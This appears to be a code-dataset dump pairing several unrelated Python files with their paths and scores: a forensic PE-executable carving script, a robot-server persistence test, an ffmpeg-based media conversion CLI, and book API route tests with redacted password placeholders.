parser.add_argument('-f', '--file', help='Raw file to carve', required=True)
parser.add_argument('-o', '--output', help='Output folder for extracted files', required=True)
parser.add_argument('--log', help='Log output file', required=False)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.file and not file_exists(args.file):
print '[!] Source file not found: {}'.format(args.file)
sys.exit(1)
if args.log:
g_log = args.log
return args
def main():
args = getArgs()
if args.output:
if not file_exists(args.output):
print('[!] Output folder does not exist: {}'.format(args.output))
quit()
output_folder = args.output
else:
output_folder = '.'
time = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
log('Scan started on %s at %s' % (args.file, time))
entries = []
fstream = bitstring.ConstBitStream(filename = args.file)
results = fstream.findall(b'0x546869732070726F6772616D') # 'This program'
log('Gathering search hits...')
for i in results:
# The result offsets are stored as binary values, so you have to divide by 8
# -78 is the negative offset to the beginning of 'MZ' from 'This program'
hit = int(i)/8-78
entries.append(hit)
log('Parsing EXEs...')
ifile = open(args.file, 'rb')
for hit in entries:
ifile.seek(hit)
PE_header = ifile.read(1024)
pesize = getSize_FromPE(PE_header)
# These sizes are arbitrary. Had numerous junk PE headers (>30GB), so did base limiting
if (10000 < pesize < 2000000) and PE_header[0:2] == 'MZ':
log('Found at: 0x%X (%d bytes)' % (hit, pesize))
ifile.seek(hit)
PE_data = ifile.read(pesize)
outfile = os.path.join(output_folder, '%s_%X.livebin' % (args.file.split('\\')[-1], hit))
open(outfile, 'wb').write(PE_data)
else:
log('Ignored PE header at 0x%X' % hit)
time = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
log('Scan ended on %s at %s' % (args.file, time))
if __name__ == '__main__':
main() | pe_carve.py |
import argparse
import bitstring # Used to parse data. Download from: http://code.google.com/p/python-bitstring/
import os
import pefile # Used to parse PE header. Download from: http://code.google.com/p/pefile/
import sys
from datetime import datetime
g_log = ''
def file_exists(fname):
return os.path.exists(fname) and os.access(fname, os.R_OK)
def log(string):
# This just tees output to a file and stdout
if g_log:
try:
open(g_log, 'a').write(string + '\n')
except:
pass
def getSize_FromPE(PE_data):
# Performs basic lookup to find the end of an EXE, based upon the
# size of PE sections. Same algorithm is used to find EXE overlay
# FYI: This will miss any overlay data, such as RAR SFX archives, etc
try:
pe = pefile.PE(data=PE_data)
return pe.sections[-1].PointerToRawData + pe.sections[-1].SizeOfRawData
except:
return 0
def getArgs():
global g_log
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', help='Raw file to carve', required=True)
parser.add_argument('-o', '--output', help='Output folder for extracted files', required=True)
parser.add_argument('--log', help='Log output file', required=False)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.file and not file_exists(args.file):
print '[!] Source file not found: {}'.format(args.file)
sys.exit(1)
if args.log:
g_log = args.log
return args
def main():
args = getArgs()
if args.output:
if not file_exists(args.output):
print('[!] Output folder does not exist: {}'.format(args.output))
quit()
output_folder = args.output
else:
output_folder = '.'
time = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
log('Scan started on %s at %s' % (args.file, time))
entries = []
fstream = bitstring.ConstBitStream(filename = args.file)
results = fstream.findall(b'0x546869732070726F6772616D') # 'This program'
log('Gathering search hits...')
for i in results:
# The result offsets are stored as binary values, so you have to divide by 8
# -78 is the negative offset to the beginning of 'MZ' from 'This program'
hit = int(i)/8-78
entries.append(hit)
log('Parsing EXEs...')
ifile = open(args.file, 'rb')
for hit in entries:
ifile.seek(hit)
PE_header = ifile.read(1024)
pesize = getSize_FromPE(PE_header)
# These sizes are arbitrary. Had numerous junk PE headers (>30GB), so did base limiting
if (10000 < pesize < 2000000) and PE_header[0:2] == 'MZ':
log('Found at: 0x%X (%d bytes)' % (hit, pesize))
ifile.seek(hit)
PE_data = ifile.read(pesize)
outfile = os.path.join(output_folder, '%s_%X.livebin' % (args.file.split('\\')[-1], hit))
open(outfile, 'wb').write(PE_data)
else:
log('Ignored PE header at 0x%X' % hit)
time = datetime.now().strftime('[%d %b %y @ %H:%M:%S]')
log('Scan ended on %s at %s' % (args.file, time))
if __name__ == '__main__':
main() | 0.238284 | 0.177954 |
import os
import pytest
import secrets
from typing import Callable, IO
from pathlib import Path
from tests.integration.dev_server import DevServer
from tests.integration.robot_client import RobotClient
from tests.integration.protocol_files import get_py_protocol, get_json_protocol
@pytest.mark.parametrize("protocol", [(get_py_protocol), (get_json_protocol)])
async def test_upload_protocols_and_reset_persistence_dir(
protocol: Callable[[str], IO[bytes]]
) -> None:
"""Test protocol and analysis persistence.
Uploaded protocols and their completed analyses should remain constant across
server restarts.
"""
port = "15555"
async with RobotClient.make(
host="http://localhost", port=port, version="*"
) as robot_client:
assert (
await robot_client.wait_until_dead()
), "Dev Robot is running and must not be."
with DevServer(port=port) as server:
server.start()
assert (
await robot_client.wait_until_alive()
), "Dev Robot never became available."
# Must not be so high that the server runs out of room and starts
# auto-deleting old protocols.
protocols_to_create = 15
for _ in range(protocols_to_create):
with protocol(secrets.token_urlsafe(16)) as file:
await robot_client.post_protocol([Path(file.name)])
await robot_client.post_setting_reset_options({"runsHistory": True})
result = await robot_client.get_protocols()
assert result.json()["data"]
assert os.listdir(f"{server.persistence_directory}/protocols/")
server.stop()
assert await robot_client.wait_until_dead(), "Dev Robot did not stop."
server.start()
assert (
await robot_client.wait_until_alive()
), "Dev Robot never became available."
result = await robot_client.get_protocols()
assert result.json()["data"] == []
assert os.listdir(f"{server.persistence_directory}/protocols/") == []
server.stop() | robot-server/tests/integration/http_api/persistence/test_persistence.py | import os
import pytest
import secrets
from typing import Callable, IO
from pathlib import Path
from tests.integration.dev_server import DevServer
from tests.integration.robot_client import RobotClient
from tests.integration.protocol_files import get_py_protocol, get_json_protocol
@pytest.mark.parametrize("protocol", [(get_py_protocol), (get_json_protocol)])
async def test_upload_protocols_and_reset_persistence_dir(
protocol: Callable[[str], IO[bytes]]
) -> None:
"""Test protocol and analysis persistence.
Uploaded protocols and their completed analyses should remain constant across
server restarts.
"""
port = "15555"
async with RobotClient.make(
host="http://localhost", port=port, version="*"
) as robot_client:
assert (
await robot_client.wait_until_dead()
), "Dev Robot is running and must not be."
with DevServer(port=port) as server:
server.start()
assert (
await robot_client.wait_until_alive()
), "Dev Robot never became available."
# Must not be so high that the server runs out of room and starts
# auto-deleting old protocols.
protocols_to_create = 15
for _ in range(protocols_to_create):
with protocol(secrets.token_urlsafe(16)) as file:
await robot_client.post_protocol([Path(file.name)])
await robot_client.post_setting_reset_options({"runsHistory": True})
result = await robot_client.get_protocols()
assert result.json()["data"]
assert os.listdir(f"{server.persistence_directory}/protocols/")
server.stop()
assert await robot_client.wait_until_dead(), "Dev Robot did not stop."
server.start()
assert (
await robot_client.wait_until_alive()
), "Dev Robot never became available."
result = await robot_client.get_protocols()
assert result.json()["data"] == []
assert os.listdir(f"{server.persistence_directory}/protocols/") == []
server.stop() | 0.727685 | 0.294684 |
import typer
from pathlib import Path
import filetype
import os
import shutil
from typer.colors import RED, GREEN
import enlighten
import ffmpeg
from utils import convertion_path, get_codec, check_ignore
from base_video_diet import convert_file, convert_video_progress_bar
def folder(path: Path = typer.Argument(
default='.',
exists=True,
file_okay=True,
dir_okay=True,
readable=True,
resolve_path=True
), ignore_extension: str = typer.Option(
default=None
), ignore_path: Path = typer.Option(
default=None,
exists=True,
file_okay=True,
dir_okay=True,
readable=True,
resolve_path=True
)):
"""
Convert all videos and audios in a folder
"""
videos = []
audios = []
for dir, folders, files in os.walk(path):
base_dir = Path(dir)
for item in files:
file_path = base_dir / item
guess = filetype.guess(str(file_path))
if check_ignore(file_path, ignore_extension, ignore_path):
continue
if guess and 'video' in guess.mime :
videos.append(file_path)
if guess and 'audio' in guess.mime:
audios.append(file_path)
manager = enlighten.get_manager()
errors_files = []
pbar = manager.counter(total=len(videos)+len(audios), desc='Files', unit='files')
for video in videos:
typer.secho(f'Processing: {video}')
if get_codec(str(video)) != 'hevc':
new_path = convertion_path(video, False)
if new_path.exists():
os.remove(str(new_path))
try:
#convert_video(str(video), str(new_path))
convert_video_progress_bar(str(video), str(new_path), manager)
os.remove(str(video))
if video.suffix == new_path.suffix:
shutil.move(new_path, str(video))
except ffmpeg._run.Error:
typer.secho(f'ffmpeg could not process: {str(video)}', fg=RED)
errors_files.append(video)
pbar.update()
for audio in audios:
typer.secho(f'Processing: {audio}')
if get_codec(str(audio)) != 'hevc':
new_path = convertion_path(audio, True)
if new_path.exists():
os.remove(str(new_path))
try:
convert_file(str(audio),str(new_path))
os.remove(str(audio))
if audio.suffix == new_path.suffix:
shutil.move(new_path, str(audio))
except ffmpeg._run.Error:
typer.secho(f'ffmpeg could not process this file: {str(audio)}', fg=RED)
errors_files.append(audio)
pbar.update()
if errors_files:
typer.secho('This files could not be processed:', fg=RED)
typer.secho(str(errors_files), fg=RED)
def file(path: Path = typer.Argument(
default=None,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True
)):
"""
Convert a file
"""
if path is None:
typer.secho('Please write the video or audio path', fg=RED)
return
guess = filetype.guess(str(path))
if guess and 'video' in guess.mime:
conv_path = convertion_path(path, False)
else:
conv_path = convertion_path(path, True)
if conv_path.exists():
typer.secho('The destination file already exist, \
please delete it', fg=RED)
return
if get_codec(str(path)) == 'hevc':
typer.secho('This file codec is already \'hevc\'', fg=GREEN)
return
try:
convert_video_progress_bar(str(path), str(conv_path))
#convert_video(str(path), str(conv_path))
except FileNotFoundError as error:
if error.filename == 'ffmpeg':
readme_url = 'https://github.com/hiancdtrsnm/video-diet#FFMPEG'
typer.secho('It seems you don\'t have ffmpeg installed', fg=RED)
typer.secho(f'Check FFMPEG secction on {readme_url}', fg=RED)
else:
raise error | video_diet.py | import typer
from pathlib import Path
import filetype
import os
import shutil
from typer.colors import RED, GREEN
import enlighten
import ffmpeg
from utils import convertion_path, get_codec, check_ignore
from base_video_diet import convert_file, convert_video_progress_bar
def folder(path: Path = typer.Argument(
default='.',
exists=True,
file_okay=True,
dir_okay=True,
readable=True,
resolve_path=True
), ignore_extension: str = typer.Option(
default=None
), ignore_path: Path = typer.Option(
default=None,
exists=True,
file_okay=True,
dir_okay=True,
readable=True,
resolve_path=True
)):
"""
Convert all videos and audios in a folder
"""
videos = []
audios = []
for dir, folders, files in os.walk(path):
base_dir = Path(dir)
for item in files:
file_path = base_dir / item
guess = filetype.guess(str(file_path))
if check_ignore(file_path, ignore_extension, ignore_path):
continue
if guess and 'video' in guess.mime :
videos.append(file_path)
if guess and 'audio' in guess.mime:
audios.append(file_path)
manager = enlighten.get_manager()
errors_files = []
pbar = manager.counter(total=len(videos)+len(audios), desc='Files', unit='files')
for video in videos:
typer.secho(f'Processing: {video}')
if get_codec(str(video)) != 'hevc':
new_path = convertion_path(video, False)
if new_path.exists():
os.remove(str(new_path))
try:
#convert_video(str(video), str(new_path))
convert_video_progress_bar(str(video), str(new_path), manager)
os.remove(str(video))
if video.suffix == new_path.suffix:
shutil.move(new_path, str(video))
except ffmpeg._run.Error:
typer.secho(f'ffmpeg could not process: {str(video)}', fg=RED)
errors_files.append(video)
pbar.update()
for audio in audios:
typer.secho(f'Processing: {audio}')
if get_codec(str(audio)) != 'hevc':
new_path = convertion_path(audio, True)
if new_path.exists():
os.remove(str(new_path))
try:
convert_file(str(audio),str(new_path))
os.remove(str(audio))
if audio.suffix == new_path.suffix:
shutil.move(new_path, str(audio))
except ffmpeg._run.Error:
typer.secho(f'ffmpeg could not process this file: {str(audio)}', fg=RED)
errors_files.append(audio)
pbar.update()
if errors_files:
typer.secho('This files could not be processed:', fg=RED)
typer.secho(str(errors_files), fg=RED)
def file(path: Path = typer.Argument(
default=None,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True
)):
"""
Convert a file
"""
if path is None:
typer.secho('Please write the video or audio path', fg=RED)
return
guess = filetype.guess(str(path))
if guess and 'video' in guess.mime:
conv_path = convertion_path(path, False)
else:
conv_path = convertion_path(path, True)
if conv_path.exists():
typer.secho('The destination file already exist, \
please delete it', fg=RED)
return
if get_codec(str(path)) == 'hevc':
typer.secho('This file codec is already \'hevc\'', fg=GREEN)
return
try:
convert_video_progress_bar(str(path), str(conv_path))
#convert_video(str(path), str(conv_path))
except FileNotFoundError as error:
if error.filename == 'ffmpeg':
readme_url = 'https://github.com/hiancdtrsnm/video-diet#FFMPEG'
typer.secho('It seems you don\'t have ffmpeg installed', fg=RED)
typer.secho(f'Check FFMPEG secction on {readme_url}', fg=RED)
else:
raise error | 0.128348 | 0.184253 |
from book_api.models.book import Book
from book_api.models.user import User
from book_api.tests.conftest import FAKE
def test_signup_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to signup get a 404 status code."""
for method in ('get', 'put', 'delete'):
res = getattr(testapp, method)('/signup', status=404)
assert res.status_code == 404
def test_signup_post_no_data_gets_400_status_code(testapp):
"""Test that POST to signup route gets 400 status code with no data."""
res = testapp.post('/signup', status=400)
assert res.status_code == 400
def test_signup_post_incomplete_data_gets_400_status_code(testapp):
"""Test that POST to signup route gets 400 status code for bad data."""
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data, status=400)
assert res.status_code == 400
def test_signup_post_complete_data_adds_user_to_database(testapp, testapp_session):
"""Test that POST to signup route creates a new User."""
assert len(testapp_session.query(User).all()) == 0
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'email': FAKE.email(),
'password': <PASSWORD>()
}
testapp.post('/signup', data)
assert len(testapp_session.query(User).all()) == 1
def test_signup_post_complete_data_gets_201_status_code(testapp):
"""Test that POST to signup route gets 201 status code."""
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'email': FAKE.email(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data)
assert res.status_code == 201
def test_signup_post_complete_data_returns_json_with_new_user_info(testapp):
"""Test that POST to signup route gets JSON with details for new User."""
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'email': FAKE.email(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data)
for prop in ['first_name', 'last_name', 'email']:
assert res.json[prop] == data[prop]
assert res.json['id'] is not None
def test_signup_post_data_without_names_sets_names_to_none(testapp):
"""Test that POST to signup route sets first and last names to None."""
data = {
'email': FAKE.email(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data)
assert res.json['first_name'] is None
assert res.json['last_name'] is None
def test_book_list_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to book-list get a 404 status code."""
for method in ('put', 'delete'):
res = getattr(testapp, method)('/books', status=404)
assert res.status_code == 404
def test_book_list_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user, fill_the_db):
"""Test that GET to book-list route gets 400 status code for missing auth."""
testapp_session.add(one_user)
testapp_session.commit()
res = testapp.get('/books', status=400)
assert res.status_code == 400
def test_book_list_get_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that GET to book-list route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
}
res = testapp.get('/books', data, status=403)
assert res.status_code == 403
def test_book_list_get_correct_auth_has_200_response_code(testapp, one_user):
"""Test that GET to book-list route gets 200 status code for good auth."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
assert res.status_code == 200
def test_book_list_get_correct_auth_empty_for_user_with_no_books(testapp, one_user):
"""Test that GET to book-list route returns empty list for user without books."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
assert res.json == []
def test_book_list_post_no_data_gets_400_status_code(testapp):
"""Test that POST to book-list route gets 400 status code with no data."""
res = testapp.post('/books', status=400)
assert res.status_code == 400
def test_book_list_post_missing_auth_gets_400_status_code(testapp):
"""Test that POST to book-list route gets 400 status code for missing auth."""
data = {
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data, status=400)
assert res.status_code == 400
def test_book_list_post_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that POST to book-list route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data, status=403)
assert res.status_code == 403
def test_book_list_post_incomplete_data_gets_400_status_code(testapp, one_user):
"""Test that POST to book-list route gets 400 status code for missing data."""
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data, status=400)
assert res.status_code == 400
def test_book_list_post_incorrect_date_gets_400_status_code(testapp, one_user):
"""Test that POST to book-list route gets 400 status code for bad data."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%Y-%m-%d')
}
res = testapp.post('/books', data, status=400)
assert res.status_code == 400
def test_book_list_post_complete_data_gets_201_status_code(testapp, one_user):
"""Test that POST to book-list route gets 201 status code."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data)
assert res.status_code == 201
def test_book_list_post_complete_data_adds_book_to_database(testapp, testapp_session, one_user):
"""Test that POST to book-list route creates a new Book."""
num_books = len(testapp_session.query(Book).all())
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
testapp.post('/books', data)
assert len(testapp_session.query(Book).all()) == num_books + 1
def test_book_list_post_sets_email_user_as_book_owner(testapp, testapp_session, one_user):
"""Test that POST to book-list route sets user with email as book owner."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data)
new_book = testapp_session.query(Book).get(res.json['id'])
assert new_book.user.email == one_user.email
def test_book_list_post_complete_data_returns_json_with_new_book_info(testapp, one_user):
"""Test that POST to book-list route gets JSON with details for new Book."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data)
for prop in ['title', 'author', 'isbn', 'pub_date']:
assert res.json[prop] == data[prop]
assert res.json['id'] is not None
def test_book_list_post_data_without_values_sets_values_to_none(testapp, one_user):
"""Test that POST to book-list route sets missing values to None."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
}
res = testapp.post('/books', data)
assert res.json['author'] is None
assert res.json['isbn'] is None
assert res.json['pub_date'] is None
def test_book_list_get_correct_auth_all_books_for_user(testapp, testapp_session, one_user):
"""Test that GET to book-list route lists all books for the users."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
user_books = testapp_session.query(User).get(one_user.id).books
assert len(res.json) == len(user_books)
def test_book_list_get_correct_auth_all_book_details(testapp, one_user):
"""Test that GET to book-list route has details for every book."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
for book in res.json:
assert all(prop in book for prop in
['id', 'title', 'author', 'isbn', 'pub_date'])
def test_book_id_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to book-id get a 404 status code."""
for method in ('post',):
res = getattr(testapp, method)('/books/1', status=404)
assert res.status_code == 404
def test_book_id_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that GET to book-id route gets 400 status code for missing auth."""
res = testapp.get('/books/1', status=400)
assert res.status_code == 400
def test_book_id_get_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that GET to book-id route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
}
res = testapp.get('/books/1', data, status=403)
assert res.status_code == 403
def test_book_id_get_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
"""Test that GET to book-id route gets 404 status code for book that does not beling to user."""
book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books/{}'.format(book.id), data, status=404)
assert res.status_code == 404
def test_book_id_get_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
"""Test that GET to book-id route gets 200 status code for good auth."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books/{}'.format(book.id), data)
assert res.status_code == 200
def test_book_id_get_correct_auth_returns_json_with_book_info(testapp, testapp_session, one_user):
"""Test that GET to book-id route return JSON with correct book data."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books/{}'.format(book.id), data)
for prop in ['id', 'title', 'author', 'isbn']:
assert res.json[prop] == getattr(book, prop)
assert res.json['pub_date'] == book.pub_date.strftime('%m/%d/%Y')
def test_book_id_put_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that PUT to book-id route gets 400 status code for missing auth."""
res = testapp.put('/books/1', status=400)
assert res.status_code == 400
def test_book_id_put_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that PUT to book-id route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
}
res = testapp.put('/books/1', data, status=403)
assert res.status_code == 403
def test_book_id_put_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
"""Test that PUT to book-id route gets 404 status code for book that does not beling to user."""
book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.put('/books/{}'.format(book.id), data, status=404)
assert res.status_code == 404
def test_book_id_put_correct_auth_incorrect_date_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that POST to book-id route gets 400 status code for bad data."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'pub_date': FAKE.date(pattern='%Y-%m-%d')
}
res = testapp.put('/books/{}'.format(book.id), data, status=400)
assert res.status_code == 400
def test_book_id_put_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
"""Test that PUT to book-id route gets 200 status code for good auth."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name()
}
res = testapp.put('/books/{}'.format(book.id), data)
assert res.status_code == 200
def test_book_id_put_correct_auth_does_not_add_book_to_database(testapp, testapp_session, one_user):
"""Test that PUT to book-id route does not create a new Book."""
book = testapp_session.query(User).get(one_user.id).books[0]
num_books = len(testapp_session.query(Book).all())
data = {
'email': one_user.email,
'password': 'password',
'isbn': FAKE.isbn13(separator="-")
}
testapp.put('/books/{}'.format(book.id), data)
assert len(testapp_session.query(Book).all()) == num_books
def test_book_id_put_correct_auth_updates_book_in_database(testapp, testapp_session, one_user):
"""Test that PUT to book-id route updates the correct book in the database."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name()
}
testapp.put('/books/{}'.format(book.id), data)
updated_book = testapp.get('/books/{}'.format(book.id), data)
assert updated_book.json['author'] == data['author']
def test_book_id_put_correct_auth_returns_json_with_updated_book_info(testapp, testapp_session, one_user):
"""Test that PUT to book-id route returns JSON with updated book data."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.put('/books/{}'.format(book.id), data)
for prop in ['id', 'title', 'author', 'isbn', 'pub_date']:
if prop in data:
assert res.json[prop] == data[prop]
else:
assert res.json[prop] == getattr(book, prop)
def test_book_id_delete_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route gets 400 status code for missing auth."""
res = testapp.delete('/books/1', status=400)
assert res.status_code == 400
def test_book_id_delete_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that DELETE to book-id route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>'
}
res = testapp.delete('/books/1', data, status=403)
assert res.status_code == 403
def test_book_id_delete_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route gets 404 status code for book that does not beling to user."""
book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
data = {
'email': one_user.email,
'password': 'password'
}
res = testapp.delete('/books/{}'.format(book.id), data, status=404)
assert res.status_code == 404
def test_book_id_delete_correct_auth_has_204_response_code(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route gets 204 status code for good auth."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password'
}
res = testapp.delete('/books/{}'.format(book.id), data)
assert res.status_code == 204
def test_book_id_delete_correct_auth_removes_book_from_database(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route does not create a new Book."""
book = testapp_session.query(User).get(one_user.id).books[0]
num_books = len(testapp_session.query(Book).all())
data = {
'email': one_user.email,
'password': 'password'
}
testapp.delete('/books/{}'.format(book.id), data)
assert len(testapp_session.query(Book).all()) == num_books - 1
def test_book_id_delete_correct_auth_removes_book_by_id(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route removes the correct Book by id."""
book = testapp_session.query(User).get(one_user.id).books[0]
book_id = book.id
data = {
'email': one_user.email,
'password': 'password'
}
res = testapp.get('/books/{}'.format(book_id), data)
assert res.status_code == 200
testapp.delete('/books/{}'.format(book_id), data)
res = testapp.get('/books/{}'.format(book_id), data, status=404)
assert res.status_code == 404 | book_api/tests/test_routes.py |
from book_api.models.book import Book
from book_api.models.user import User
from book_api.tests.conftest import FAKE
def test_signup_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to signup get a 404 status code."""
for method in ('get', 'put', 'delete'):
res = getattr(testapp, method)('/signup', status=404)
assert res.status_code == 404
def test_signup_post_no_data_gets_400_status_code(testapp):
"""Test that POST to signup route gets 400 status code with no data."""
res = testapp.post('/signup', status=400)
assert res.status_code == 400
def test_signup_post_incomplete_data_gets_400_status_code(testapp):
"""Test that POST to signup route gets 400 status code for bad data."""
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data, status=400)
assert res.status_code == 400
def test_signup_post_complete_data_adds_user_to_database(testapp, testapp_session):
"""Test that POST to signup route creates a new User."""
assert len(testapp_session.query(User).all()) == 0
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'email': FAKE.email(),
'password': <PASSWORD>()
}
testapp.post('/signup', data)
assert len(testapp_session.query(User).all()) == 1
def test_signup_post_complete_data_gets_201_status_code(testapp):
"""Test that POST to signup route gets 201 status code."""
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'email': FAKE.email(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data)
assert res.status_code == 201
def test_signup_post_complete_data_returns_json_with_new_user_info(testapp):
"""Test that POST to signup route gets JSON with details for new User."""
data = {
'first_name': FAKE.first_name(),
'last_name': FAKE.last_name(),
'email': FAKE.email(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data)
for prop in ['first_name', 'last_name', 'email']:
assert res.json[prop] == data[prop]
assert res.json['id'] is not None
def test_signup_post_data_without_names_sets_names_to_none(testapp):
"""Test that POST to signup route sets first and last names to None."""
data = {
'email': FAKE.email(),
'password': <PASSWORD>()
}
res = testapp.post('/signup', data)
assert res.json['first_name'] is None
assert res.json['last_name'] is None
def test_book_list_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to book-list get a 404 status code."""
for method in ('put', 'delete'):
res = getattr(testapp, method)('/books', status=404)
assert res.status_code == 404
def test_book_list_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user, fill_the_db):
"""Test that GET to book-list route gets 400 status code for missing auth."""
testapp_session.add(one_user)
testapp_session.commit()
res = testapp.get('/books', status=400)
assert res.status_code == 400
def test_book_list_get_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that GET to book-list route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
}
res = testapp.get('/books', data, status=403)
assert res.status_code == 403
def test_book_list_get_correct_auth_has_200_response_code(testapp, one_user):
"""Test that GET to book-list route gets 200 status code for good auth."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
assert res.status_code == 200
def test_book_list_get_correct_auth_empty_for_user_with_no_books(testapp, one_user):
"""Test that GET to book-list route returns empty list for user without books."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
assert res.json == []
def test_book_list_post_no_data_gets_400_status_code(testapp):
"""Test that POST to book-list route gets 400 status code with no data."""
res = testapp.post('/books', status=400)
assert res.status_code == 400
def test_book_list_post_missing_auth_gets_400_status_code(testapp):
"""Test that POST to book-list route gets 400 status code for missing auth."""
data = {
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data, status=400)
assert res.status_code == 400
